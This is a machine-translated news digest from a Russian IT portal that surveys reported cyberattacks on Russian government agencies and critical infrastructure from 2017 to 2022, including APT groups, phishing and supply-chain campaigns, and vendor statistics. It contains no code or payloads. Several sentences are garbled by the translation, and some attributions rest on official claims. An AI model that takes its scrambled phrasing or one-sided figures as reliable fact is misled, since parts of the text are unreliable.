On April 20, 2022, it became known that unknown persons hacked the MINISTRY OF EMERGENCY SITUATIONS Media website, which is the departmental Ministry of MEDIA Emergency Situations. Russia This was reported on the page of the same name on the network "." Vkontakte More. here
Hackers hacked the website of the Russian Emergencies Ministry and the heads of the ministry in the regions
On March 16, 2022, it became known about the official hacking of the website of the Ministry of Civil Defense, Emergencies and Disaster Management (EMERCOM of Russia). As a result of a cyber attack by unknown hackers, the Internet resource of not only the federal department, but also all its regional headquarters, became unavailable. Read more here.
Russian Foreign Ministry confirms cyber attack on ministry employees
On January 18, 2022, it became known about cyber attacks on employees of the Russian Ministry of Foreign Affairs. According to the American information security companies Cluster25 (part of DuskRis) and Black Lotus Labs (part of Lumen Technologies), the North Korean hacker group Konni is allegedly behind these attacks. Read more here.
2021
More than 90% of attacks by highly professional groups are directed at critical infrastructure facilities
The vast majority (92%) of cyber attacks committed by highly professional attackers in 2021 were aimed at critical information infrastructure (CII) facilities. Most often, the attention of highly qualified hackers - cyber recruits and pro-government groups - was attracted by state organizations, power enterprises, industry and the military-industrial complex. Such figures were announced on December 7, 2021 by the vice-president of Rostelecom for cybersecurity, the general director of Rostelecom-Solar Igor Lyapunov.
In total, according to a study by Rostelecom-Solar, in 2021, over 300 attacks carried out by professional attackers were recorded, which is one third higher than in 2020. Most of the attacks were carried out by groups with an average qualification - cyber crime. Such hackers use customized tools, available HPE and vulnerabilities, social engineering, and their main goal is to directly monetize an attack using encryption, mining or cash withdrawal.
Highly professional groups accounted for 18% of the attacks committed during the reporting period. Such cybercriminals use complex tools: self-written software, 0-day vulnerabilities, previously implemented "bookmarks." As a rule, they are aimed at custom work, cyber espionage, hacktivism, complete seizure of infrastructure, and their victims are large businesses and CII facilities.
| | Such attacks are almost always targeted, so at first attackers carefully study the attacked organization. Moreover, cyber recruits and pro-government groups conduct reconnaissance not only against the victim's IT perimeter, but also against its contractors, "said Vladimir Dryukov, director of the Solar JSOC Cyber Attack Center at Rostelecom-Solar. - These groups are well acquainted with the logic of the basic means of information protection, which allows them to remain unnoticed for a long time. And the damage from their actions can amount to hundreds of millions of rubles. If we are talking about CII, then there are also risks associated with the impact on the country's economy as a whole, the security of citizens and the political situation. | |
The key techniques used by professional hackers to hack the perimeter have changed slightly over the year. Phishing still occupies a leading position among medium-level attackers (60% of attacks), which is explained by its cheapness and mass.
In 50% of attacks, highly qualified hackers exploit web vulnerabilities. This is due to the fact that web applications of CII objects and state authorities (for example, corporate portals or web mail) are still poorly protected and have a huge number of errors. In addition, highly professional attackers more often than cybercriminal resort to attacks through a contractor, an increase in the number of which has been observed for several years. Phishing, on the contrary, is used by them only in 2% of cases. The most popular hacking techniques in 2021 also added exploitation of vulnerabilities in MS Exchange, which were published at the end of 2020.
As a year earlier, cybercriminals most often used startup mechanisms and system services to secure inside the network. And for the development of the overwhelming number of attacks - remote services RDP, SMB, SSH. In particular, this is due to the massive transition to remote operation: companies have begun to actively use these protocols, which allow organizing remote access to files and devices.
Hacker group attacking Russian fuel and energy complex and aviation industry discovered
At the end of September 2021, it became known about the appearance of a new hacker group ChamelGang, which was seen in attacks on critical information infrastructure, including in Russia. Read more here.
A large-scale cyber attack against the public sector has been registered in Russia
On September 22, 2021, it became known about a large-scale cyber attack on state institutions and departments of Russia and neighboring countries. This was reported in the British company Cyjax, specializing in information security.
As Kommersant"" writes with reference to the Cyjax study phishing attack , organized, in particular, against the Russian Academy of Sciences (), RAS postal service, Mail.ru Group as well as government agencies of more than a dozen countries, including,,,,, Armenia,, Azerbaijan, and China. Kyrgyzstan Georgia Belarus Ukraine Turkey Turkmenistan Uzbekistan
The Mail.ru Group said it controls the emergence of phishing sites and fraudulent emails in order to "respond in a timely manner to such incidents, including those listed in the report." The company added that the mail runs an automatic antispam system that adapts to new spam scenarios, including phishing.
Experts reported the existence of 15 sites that simulate email entry portals for employees of the Ministries of Foreign Affairs, Finance or power of various countries.
The attackers used a site to attack, which was disguised as a service email. The scheme works like this: employees are notified that a new portal has appeared on which they need to register. Then hackers they get their logins and passwords, as well as access to the letters of the victims. As a result, attackers manage to send infected files to company or agency partners.
According to Cyjax, the purpose of the attack is to collect logins and passwords to access the mailboxes of civil servants. Given the lack of immediate financial benefits from the attack and the focus on the Russian Federation and neighboring countries, a certain pro-state group may be behind it, Cyjax believes.
According to Alexei Novikov, director of the Positive Technologies security expert center, hackers can use the access they gain to continue the attack by sending letters with a malicious attachment to the company's partners.[13]
Ministry of Digital Development of Digital: 50% of cyber attacks on online elections came from the United States
On September 20, 2021, the Ministry of Ministry of Digital Development named the countries from where the cyber attacks on electronic voting systems in Russia were carried out. About half of the IP addresses used by hackers were in the United States. Read more here.
US ambassador summoned to Russian Foreign Ministry due to interference in Russian elections
On September 11, 2021, it became known that Ministry of Foreign Affairs of Russia he summoned the ambassador USA To Moscow to John Sullivan to discuss the interference the American IT of companies in the elections in. State Duma
Foreign Ministry spokesman Sergei Ryabkov told John Sullivan, summoned by the Russian Foreign Ministry on September 10, about the inadmissibility of interference in Russian affairs. Ryabkov also told the diplomat about the presence of evidence of violation of the laws of the Russian Federation by American digital giants before the elections to the State Duma. That evidence is overwhelming, he said.
According to the US State Department, their ambassador discussed issues of bilateral relations at the Russian Foreign Ministry on Friday, namely, he participated in a conversation about support for "the desire of US President Joe Biden for stable and predictable relations with Russia."[14]
Chinese government hackers attacked the Russian public sector
Chinese government hackers attacked Russian companies. This became known on August 3, 2021.
Traces of attacks by the hacker group ART31, which is known for numerous attacks on state structures of different countries, have been recorded. The group first attacked Russian companies. According to Positive Technologies, in the first half of 2021, the ART31 group, in addition to actions in Russia, conducted about ten malicious mailings in Mongolia, the USA, Canada and Belarus.
The hacker group ART31, also known as Hurricane Panda and Zirconium, has been operating since the 2010s. Its representatives attack mainly the public sector, spying on potential victims and collecting confidential information. Microsoft previously indicated that the APT31 is operating from China, and the British government in mid-July linked the activities of this group with the Chinese Ministry of State Security.
According to Positive Technologies experts, since the spring of 2021, ART31 has begun to expand the geography of attacks and use a different way of hacking and infecting gadgets. According to the company, hackers send phishing emails that contain a link to a fake domain - inst.rsnet-devel [.] com. It completely imitates the domain of certain government agencies. When a link is opened, the so-called dropper (remote access Trojan) gets into the user's computer, which creates a malicious library on the infected device and installs a special application. Next, the application launches one of the functions of the downloaded malicious library, and control of the computer passes into the hands of the attacker.
information security Daniil Koloskov, senior specialist in the threat research department of Positive Technologies, warns that malicious developers software are trying to bring the malicious library as close as possible to the original one, the names of the function sets of the infected library partially coincide with the official one. Another trick for hackers was that in some attacks, the dropper was signed real valid, and digitally signed many security tools perceived it as a program from a certified manufacturer. Positive Technologies experts believe that the signature was most likely stolen, which indicates that the group is well prepared.
Denis Kuvshinov, head of the information security threats research department at Positive Technologies, predicts that in the near future ART31 will use other tools in attacks, including on Russia, they can be detected by matching the code or infrastructure of the Network. Positive Technologies specialists have already reported on the attack of a hacker group recorded by them in the State System for Detecting, Preventing and Eliminating the Consequences of Computer Attacks (State system of detection, prevention and elimination of consequences of computer attacks). In the near future, the company does not expect a decrease in the number of cyber attacks by ART31, so it advises commercial and other structures to implement indicators in their protective equipment that will help detect such a virus in time[15]
The number of cyber attacks on critical infrastructure of the Russian Federation increased by 150%
The number of cyber attacks on critical infrastructure of the Russian Federation increased by 150%. This became known on July 12, 2021.
In 2020, the figure also increased, but by only 40%. Ransomware mainly attacked the educational and scientific spheres, as well as the industry. They accounted for 30% of the total number of attacks.
The Russian company Group-IB has calculated that 40% of all attacks are carried out by "classic" cybercriminals. But the remaining 60% are accounted for by pro-government agencies of other states.
Industrial companies are attacked by ransomware in most cases. It turns out that every large company is a potential victim for cybercriminals. And the amount of buybacks is increasing.
Experts predict that the number of cyber attacks in the future will only increase, and the amounts requested by fraudsters will grow[16]
A surge in hacker attacks on Russian research institutes
In mid-April 2021, it became known about a surge in hacker attacks on Russian research institutes (NII). First of all, foreign hackers are interested in institutions that are engaged in military and aviation development, as well as the creation of vaccines against the coronavirus COVID-19, according to Group-IB, a company specializing in information security.
Doctor Web confirmed this trend to Kommersant. According to Igor Zdobnov, head of the Doctor Web virus laboratory, it is difficult to detect targeted attacks, since they concern only one company, while the "blind" beat a large number of subjects. Behind the cyber attacks on the research institute are hackers who are sponsored by the authorities of the countries for the purpose of espionage, the expert is sure.
Igor Zalevsky, head of the Rostelecom-Solara cyber incident investigation department, points to the possibility of using information stolen from the research institute for political purposes, in this he sees the reason for the interest of hackers working for the state in the research institute. The work of the research institute is associated with unique information from various industries: schemes, product drawings, closed studies, which are intellectual property, the expert lists. Such data may be interesting for monetization and simply on the black market, he added.
Sometimes hackers use several viruses at once. For example, on the network of one of the clients, Group-IB specialists identified six types of such programs, including in accounting, on employees' workers and mobile devices. At the same time, attackers usually do not immediately launch research institutes into the network malwares and pre-use auxiliary modules that do not allow detection, trojans said a senior expert on cyber security "." Kaspersky Lab Denis Legezo NII[17]
Cyber attacks through contractors hit banks and enterprises of the fuel and energy complex in Russia
At the end of March 2021, a service for protecting information assets Rostelecom-Solar published a study in which it reported a twofold increase in the number of attacks on objects critical information infrastructure (:, CUES banks enterprises ENERGY INDUSTRY , etc.) by penetrating through the contractor's infrastructure (supply chain method) in 2020. cyber attacks Solar JSOC The Rostelecom-Solar Monitoring and Response Center identified and reflected over 1.9 million, which is attacks 73% more than in 2019.
According to experts, hacking a contractor has become the most effective method for penetrating infrastructure targeted for cybercriminals, including, as a rule, the largest federal public sector organizations and KII facilities. This is also confirmed by international experience. At the end of 2020, it became known about the hacking of the developer company, ON SolarWinds as a result of which such clients as,, Microsoft Cisco FireEye as well as several key ministries and departments suffered. USA Solar JSOC records similar attempts at attacks on authorities and objects. Russia
The active use of the supply chain method is associated with an increase in the number of more complex targeted attacks. In addition, organizations are increasingly outsourcing part of their internal processes, but they rarely monitor their own infrastructure and practically do not control the connection points of third-party companies to their network. As a result, the problem can remain out of focus for a long time. This is what led to the growth of such attacks in 2020.
Rostelecom The company "-Solar" noted that the growing popularity of the supply chain method indicates not just a change in the technical specifics of attacks, but the emergence of a new key threat cyber security at the state level. However, there is no clear solution to how to minimize risks yet. Even a contractor certified by the regulator for compliance with information security standards can be successfully attacked by attackers. At the same time, the customer company does not have the ability to directly control the level of information security protection of the outsourcer, experts added.
| | Obviously, advanced ART groups will increasingly use the supply chain technique, so the information security community needs to develop a fundamental approach to solving the problem as soon as possible, - said Vladimir Dryukov, director of the Solar JSOC cyber attack monitoring and response center at Rostelecom-Solar. | |
Also, for the first time since 2017, Solar JSOC experts record an increase in violations committed by internal users - ordinary employees of companies. More than half (53%) of internal incidents were related to: information leaks by switching to, remote operation mode employees began to commit violations, including theft and draining, data which they would not dare to do in the office. In addition, pandemic it has led to an increase in violations regarding access to. Internet It is not only about visiting suspicious sites from a worker. computer Remote workers could also gain illegitimate access to the company's closed resources, since it is VPN difficult to correctly segment the corporate network on the basis.
The most common tool for external attackers has become malware, and the main way to deliver it to the victim's infrastructure is phishing emails, most of which have speculated on the topic of COVID-19. At the same time, there is a significant increase (by a third) in the number of attacks using ransomware: during the period of mass "remote control," when many companies have weakened information security, this already simple method of monetization has become even more popular.
In 2020, the number of attacks aimed at gaining control over infrastructure increased by 30%, while the number of attacks aimed at stealing funds increased slightly (by less than 10%). This indicates a significant increase in the qualifications of attackers and the complication of their tools.
2020 Report on Attacks and Tools of Professional Groups
2020
120 thousand cyber attacks were committed on the IT systems of government agencies, banks and the fuel and energy complex of Russia
More than 120 thousand hacker attacks were committed on the critical information infrastructure of Russia (this includes the IT systems of government agencies, banks, the fuel and energy complex, etc.) in 2020 . This figure was announced on June 24, 2021 by the Secretary of the Security Council of the Russian Federation, Army General Nikolai Patrushev.
According to him, cyberspace is increasingly becoming the scene of the fight against "geopolitical opponents," and Russia is regularly subjected to computer attacks.
| | Most of them were carried out from the United States, Germany and the Netherlands, and were directed against the objects of public administration, the military-industrial complex, health care, transport, science and education of our country, he said. | |
As the Secretary of the Security Council noted, Russia advocates non-politicized cooperation between countries to create a global cybersecurity system.
| | Russia advocates the development of international cooperation in the interests of the formation of a global international legal regime that ensures the safe and equal use of information and communication technologies, he stressed in an interview with Rossiyskaya Gazeta. | |
On June 24, 2021, Group-IB cited data according to which three times as many attacks on critical infrastructure objects were registered in Russia in the first half of 2020 than in the entire 2019. 40% of attacks on KII facilities in Russia were committed by cyber crime, 60% - by pro-state attackers.
Nikita Kislitsin, head of the Network Security Department of Group-IB, noted that about 8 out of 10 Russian industrial enterprises have problems with servicing the IT infrastructure.
According to experts, problems with servicing the IT infrastructure of organizations are caused by a lack of resources, outdated software and often an unfinished patch management process.[18]
An increase in the number of cyber attacks on authorities by 2 times - FSB information security center
More than half (58%) of cyber attacks in Russia in 2020 fell on state authorities, while in 2019 this share was 27%. Such data at the end of April 2021 were cited by the Deputy Director of the National Coordination Center for Computer Incidents (NCCCI; coordinates the detection, prevention and elimination of the consequences of computer attacks on critical information infrastructure in Russia and response to computer incidents) Nikolai Murashov.
| | An analysis of the data conducted by the NCCCA showed that if in 2019 the largest share of computer attacks was aimed at the credit and financial sector - 33%, then in 2020 - at the information resources of state authorities and industrial enterprises, Murashov said at an online briefing (quoted by RIA Novosti). | |
According to him, the share of hacker attacks on the IT systems of industrial enterprises in 2020 reached 38% against 18% a year earlier.
Earlier, Secretary of the Security Council of the Russian Federation Nikolai Patrushev said that the intensity of foreign intelligence in cyberspace has increased significantly against the background of the aggravation of the situation in the world, and the number of hacker attacks on Russian information resources in 2020 increased 1.6 times.
Patrushev noted the annual growth of hacker attacks on the IT resources of authorities and companies "in order to block them, gain access to protected data banks and covert management of information systems."
| | At the same time, the issue of exploiting vulnerabilities of software used in government agencies and organizations for intelligence purposes remains relevant. More than 30% of the identified vulnerabilities can be used remotely to conduct computer attacks on the information infrastructure, "said the Secretary of the Security Council of the Russian Federation.[19] | |
Kemerovo resident convicted of cyber attacks on KII RF
Kemerovo resident was convicted of cyber attacks on the KII of the Russian Federation. This became known on November 27, 2020. Read more here.
Preparations for a spy attack by a Chinese APT group on Russian fuel and energy complex enterprises discovered
On September 24, 2020, it became known that the developer of information security tools, Doctor Web, published a study of a phishing campaign that was aimed at Russian enterprises in the fuel and energy complex. The first wave was dated April 2020, the last manifestations of activity occurred in September 2020. Read more here.
90% of IT systems of government agencies in Russia are able to hack inexperienced cyberhuligans
About 90% of the IT systems of government agencies in Russia are capable of hacking not only highly qualified hackers, but also inexperienced cyberhuligans. This conclusion is contained in a study prepared by Rostelecom-Solar based on the analysis of data on 40 state organizations and authorities of the federal and regional level. The report was published in September 2020.
According to Vladimir Dryukov, director of the center for monitoring and responding to cyber attacks Solar JSOC of Rostelecom-Solar, cyberhuligans are aimed at simple monetization and are engaged in encryption of servers and computers, hidden cryptocurrency mining, creating botnets from the received resources to organize DDoS attacks or phishing mailings. More experienced specialists are trying to gain long-term control over the infrastructure or access to confidential data for the purpose of cyber espionage, he said.
Experts note a low level of "cyber hygiene" in government agencies. More than half of such institutions use an unprotected connection (most often the http protocol, in which transmitted data is not encrypted and can be intercepted).
more than 70% of organizations are exposed to classic web vulnerabilities that attackers use as an entry point into the victim's infrastructure. For example, exposure to SQL injections that allow you to hack into the site database and make changes to the script. Or an XSS vulnerability with which an attacker can integrate his own script into the page of the victim site
In addition, more than 60% of government organizations have vulnerabilities in various components (Apache servers or solutions for launching Apache Tomcat web applications, WordPress site management systems, PHP programming language) and even the operating system itself (a series of Shellshock vulnerabilities that are considered one of the most dangerous).[20]
2019
Hackers have been preparing attacks on the fuel and energy complex for years
Hackers have been preparing attacks on enterprises in the fuel and energy sector for years. This was announced on November 14, 2019 by Positive Technologies.
According to experts, professional cyber groups conducting targeted attacks do not destructively attack immediately after penetration. They can control all systems of the enterprise for several years without taking any destructive action, but only stealing important information and waiting for the right moment to launch an attack.
During the investigation of one of the incidents, experts discovered that the TaskMasters group, which was engaged in the theft of confidential documents and espionage, had been in the infrastructure of the victim company for at least 8 years.
Basically, hackers attack the fuel and energy complex in order to disrupt its production process or to steal corporate information and damage its reputation. Only one in three attacks is aimed at stealing funds, and most often companies are faced with information leaks or data substitution and destruction.
Cyber attacks of the fuel and energy complex with information leakage account for 30% of the total number of incidents. In 26% of cases, data is destroyed or exchanged. 25% of enterprises surveyed said that after the attacks, the company's infrastructure is idle.
According to Alexei Novikov, director of the Positive Technologies security expert center, it is very difficult to detect a targeted attack at the time of intruders entering the system. It is easier and more efficient to disclose the activity of a hacker after entering the infrastructure, for example, when it moves between servers already on the internal network.
| | Such movements certainly leave artifacts in network traffic and on the nodes themselves, this allows you to detect the previous penetration retrospectively and eliminate the threat before the attacker proceeds to active destructive actions or steals important information, Novikov said.[21] | |
Russian government agencies attacked hackers from China for years
On May 13, 2019, it became known about the existence of a cyber group that attacked Russian government agencies and companies for several years, using an operating system task scheduler to hack.
Positive Technologies called this hacker group TaskMasters for using a task scheduler to penetrate local networks. After the hack, hackers examined networks for vulnerabilities, downloaded malware there and engaged in espionage. How the attackers used the information received is unknown.
As Kommersant was told in Positive Technologies, a cyber group with supposedly Chinese roots attacked government agencies and companies for at least nine years, some of them were in Russia. Experts are aware of the compromise of more than 30 significant organizations from industries, construction, power, real estate, etc., of which 24 are in Russia. The names of the companies were not disclosed.
According to Positive Technologies, the code of the tools used by TaskMasters contains mentions of Chinese developers, during some attacks connections from IP addresses from China were recorded, and keys for some versions of programs can be found on the forums where residents of this country communicate.
Kaspersky Lab says it has been monitoring the activity of the same group, which is called BlueTraveler, since 2016. The targets of her attacks there are called government agencies, mainly from Russia and the CIS, confirming that the attackers most likely speak Chinese.
Kaspersky Lab adds that the method of securing in the infrastructure and further distribution using the task scheduler has long been and is often used by cybercriminals. As a rule, such attacks help political intelligence or are engaged in industrial espionage, the company noted.[22]
2018: In 2018, about 4.3 billion cyber attacks were committed on the Russian Federation
According to the National Coordination Center for Computer Incidents, in 2018, more than 4.3 billion cyber attacks were carried out on critical infrastructures of the Russian Federation. This was announced in August 2019 by the Deputy Secretary of the Security Council of the Russian Federation Oleg Khramov in an interview with Rossiyskaya Gazeta.
According to Khramov, the number of cyber attacks over the past six years has grown by 57%. If for the period from 2014 to 2015, cases of coordinated targeted attacks amounted to about 1.5 thousand per year, then in 2018 their number exceeded 17 thousand. Attacks aimed at disabling equipment of critical infrastructure facilities pose a particular danger.
Since the beginning of 2019, the introduction of malicious software on more than 7 thousand objects of critical infrastructures has been prevented. The targets of the attackers' attacks were objects of the credit and financial sphere (38% of all attacks), government bodies (35%), the defense industry (7%), the field of science and education (7%) and the health sector (3%).
According to the American company Webroot, in 2018, the United States accounted for 63% of Internet resources that distribute malware, while the share of China and Russia is only 5% and 3%, respectively.
2017
Danish Defense Ministry: Russian hackers hacked the mail of our employees for two years
Hackers from Russia associated with the country's leadership for two years gained access to electronic mailboxes of the Danish Ministry of Defense. This was announced in April 2017 by the Minister of Defense of the country Klaus Yort Fredriksen.
The report, cited by Berlingske, reports that during 2015 and 2016, hackers from the Fancy Bear group had access to the unclassified mail content of some military officials.
According to the publication, "for a long time, hackers sent a large number of emails to specific employees in the Ministry of Defense." Employees received messages that "the system requires an update and" they must enter their passwords. " To mislead ministry employees, the hackers used fake entry pages, which were a replica of the ministry's pages. In addition, the purpose of the alleged hackers, the newspaper informs, could be not only to obtain the necessary information, but also the possible recruitment of agents from among the ministry's employees.
It is noted that hacking became possible because not all mailboxes were sufficiently protected. Now this problem has been eliminated by the[23] of[24].
Russian aerospace industry attracts growing interest of Chinese cyber spies
In February 2017, it became known that Chinese hackers began to intensively attack aerospace companies in Russia and Belarus. This conclusion was made by Proofpoint experts monitoring the activities of the group, previously seen in attacks on government structures and commercial companies around the world.[25]
Hackers allegedly acting in the interests of the PRC government used the NetTraveler Trojan and the PlugX remote administration tool. With their help, criminals carried out espionage activities around the world.
Starting in the summer of 2016, this group began to use a new malware called ZeroT, which, after entering the system, downloads and installs PlugX.
ZeroT itself is distributed using speer-phishing (narrowly directed) letters containing attachments in HTML Help (.chm) format. Hackers used.chm documents with executable files integrated into them. Account Control (UAC) responded properly to attempts to open these.chm files (and in reality, attempts to run executable components), but in at least a few cases, users "obediently" contributed to the infection.
This is in no small part due to the effectiveness of headlines in phishing emails such as the 2017-2020 Federal Target Program, Changes in the list of affiliates as of 21.06.2016, and so on.
Hackers also actively exploited the CVE-2012-0158 vulnerability by sending files for Microsoft Word with exploits, and self-extracting.rar files containing components to bypass the audit trail.
China is regularly accused of active cyber espionage against other countries. The PRC authorities categorically deny all accusations, but cybersecurity experts around the world have gained sufficient evidence that the PRC armed forces have units engaged in cyber espionage and cyber attacks.
| | Cyber espionage, like traditional espionage, has long been a factor in international politics, which has to be constantly kept in mind, "says Dmitry Gvozdev, CEO of Security Monitor. "We live in an era of" cold cyber war "of global proportions. Any industry of strategic importance becomes an object of unfriendly interest, and attempts at attacks are only a matter of time. As for their success, it all depends on how much the personnel of the attacked organizations are ready to attack, knows how to identify attempts at cyber attacks, knows how to distinguish phishing emails from legitimate ones, and how closely IT personnel monitor timely software updates. | |
Notes
- ↑ Service outages, schedule changes possible
- ↑ zloumyshlenniki-atakuyut-rossijskie-gosuchrezhdeniya-cherez-zhivoj-zhurnal Attackers attack Russian government agencies through Live Journal
- ↑ Data storage will be protected by requirements
- ↑ " Slumdog millionaires, which
- ↑ of How an Indian startup hacked the world
- ↑ law news/ 20240214/309622418.html Expert named the main reasons for successful cyber attacks on enterprises and government agencies
- ↑ Subject protection
- ↑ The FSB of Russia suppressed the illegal activities of a Russian citizen who committed high treason in the Kemerovo region
- ↑ Kaspersky Lab detected attacks on Russian institutions to steal data
- ↑ Almost half of Russian departments were subjected to cyber attacks
- ↑ Chinese hackers have attacked Russian government agencies, defense and state-owned companies without explanation
- ↑ Positive Technologies: government agencies are the worst protected from cyber attacks
- ↑ Hackers took on officials. Experts found a cyber attack on government officials
- ↑ US ambassador summoned to Russian Foreign Ministry due to interference in Russian elections
- ↑ Chinese government hackers first attacked Russian companies.
- ↑ The number of cyber attacks on critical infrastructure of the Russian Federation has increased by 150%.
- ↑ step back. Russian science is attacked by superior forces of foreign hackers
- ↑ Patrushev: 120 thousand cyber attacks were committed on the IT systems of government agencies, banks and the fuel and energy complex of Russia for the year
- ↑ Hackers have become more likely to attack authorities, the Cyber Threats Center said
- ↑ Rostelecom-Solar named key vulnerabilities in the IT infrastructures of state organizations and authorities
- ↑ and technologies/ 20191114/830545130.html Hackers prepare attacks on the fuel and energy complex for several years
- ↑ Hackers built into the system
- ↑ [https://meduza.io/news/2017/04/23/minoborony-danii-rossiyskie-hakery-dva-goda-vzlamyvali-pochtu-nashih-sotrudnikov Danish Ministry of Defense: Russian hackers hacked the mail
- ↑ our employees for two years]
- ↑ Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX
| The site content is translated by machine translation software powered by PROMT. The machine-translated articles are not always perfect and may contain errors in vocabulary, syntax or grammar. Read original article If you find inaccuracies or errors in the results of machine translation, please write to editor@tadviser.ru. We will make every effort to correct them as soon as possible. |